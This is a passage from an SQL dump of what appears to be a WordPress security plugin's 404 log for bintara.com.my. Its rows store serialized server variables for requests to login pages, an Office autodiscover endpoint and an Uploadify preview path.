Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"145-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:2:\"on\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:2:\"on\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"145-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-admin.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbFllMk@05cSct0OyUhvmQAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-admin.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbFllMk@05cSct0OyUhvmQAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.216\";s:11:\"REMOTE_PORT\";s:5:\"54543\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-admin.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-admin.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbFllMk@05cSct0OyUhvmQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571906965.0084\";s:12:\"REQUEST_TIME\";s:10:\"1571906965\";}}','notice','2019-10-24 08:49:28','2019-10-24 08:49:25',34995656,36793512,'https://bintara.com.my/wp-admin.php',1,0,'175.145.63.216'),(28893,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:60:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/wp-login\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:3:\"2-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d98826486a57f218e75d884d0af734b7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:3:\"2-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/wp-login\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/wp-login\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbFl1P5cHc@dX2BdZ46fFQAAAAE\";s:12:\"REDIRECT_URL\";s:9:\"/wp-login\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.216\";s:11:\"REMOTE_PORT\";s:5:\"54580\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/wp-login\";s:10:\"SCRIPT_URL\";s:9:\"/wp-login\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbFl1P5cHc@dX2BdZ46fFQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571907029.0316\";s:12:\"REQUEST_TIME\";s:10:\"1571907029\";}}','notice','2019-10-24 08:50:31','2019-10-24 08:50:29',34980856,36778368,'https://bintara.com.my/wp-login',1,0,'175.145.63.216'),(28894,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:74:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:10:\"/login.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"20-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d98826486a57f218e75d884d0af734b7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"20-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:2:\"on\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:2:\"on\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"20-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:10:\"/login.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbFl3v5cHc@dX2BdZ46fNQAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbFl3v5cHc@dX2BdZ46fNQAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.216\";s:11:\"REMOTE_PORT\";s:5:\"54589\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"https://bintara.com.my/login.php\";s:10:\"SCRIPT_URL\";s:10:\"/login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbFl3v5cHc@dX2BdZ46fNQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571907038.8797\";s:12:\"REQUEST_TIME\";s:10:\"1571907038\";}}','notice','2019-10-24 08:50:40','2019-10-24 08:50:39',34994968,36807200,'https://bintara.com.my/login.php',1,0,'175.145.63.216'),(28895,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:60:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/wp-login\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:3:\"5-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d98826486a57f218e75d884d0af734b7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:3:\"5-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/wp-login\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/wp-login\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbFl7f5cHc@dX2BdZ46fQQAAAAE\";s:12:\"REDIRECT_URL\";s:9:\"/wp-login\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.216\";s:11:\"REMOTE_PORT\";s:5:\"54595\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/wp-login\";s:10:\"SCRIPT_URL\";s:9:\"/wp-login\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbFl7f5cHc@dX2BdZ46fQQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571907053.5121\";s:12:\"REQUEST_TIME\";s:10:\"1571907053\";}}','notice','2019-10-24 08:50:55','2019-10-24 08:50:54',34980856,36778368,'https://bintara.com.my/wp-login',1,0,'175.145.63.216'),(28896,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:60:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/wp-login\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"21-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:251:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wp-settings-time-1=1570071531; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"21-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/wp-login\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/wp-login\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbFqpP5cHc@dX2BdZ46l2gAAAAE\";s:12:\"REDIRECT_URL\";s:9:\"/wp-login\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.216\";s:11:\"REMOTE_PORT\";s:5:\"54799\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/wp-login\";s:10:\"SCRIPT_URL\";s:9:\"/wp-login\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbFqpP5cHc@dX2BdZ46l2gAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571908260.3084\";s:12:\"REQUEST_TIME\";s:10:\"1571908260\";}}','notice','2019-10-24 09:11:05','2019-10-24 09:11:00',35376688,37177456,'https://bintara.com.my/wp-login',1,0,'175.145.63.216'),(28897,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:70:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.4639; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbFxaf5cHc@dX2BdZ46q0wAAAAs\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.164.95.193\";s:11:\"REMOTE_PORT\";s:4:\"9939\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbFxaf5cHc@dX2BdZ46q0wAAAAs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571909993.6541\";s:12:\"REQUEST_TIME\";s:10:\"1571909993\";}}','notice','2019-10-24 09:39:56','2019-10-24 09:39:54',35276360,37083648,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.164.95.193'),(28417,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/index.php/api/Uploadify/preview\";s:14:\"CONTENT_LENGTH\";s:2:\"66\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:9:\"PATH_INFO\";s:22:\"/api/Uploadify/preview\";s:15:\"PATH_TRANSLATED\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.90.14\";s:11:\"REMOTE_PORT\";s:5:\"64591\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:10:\"SCRIPT_URL\";s:32:\"/index.php/api/Uploadify/preview\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xas7OgYF48xX3r6hM@mP6gAAABU\";s:8:\"PHP_SELF\";s:32:\"/index.php/api/Uploadify/preview\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571502906.8705\";s:12:\"REQUEST_TIME\";s:10:\"1571502906\";}}','notice','2019-10-19 16:35:08','2019-10-19 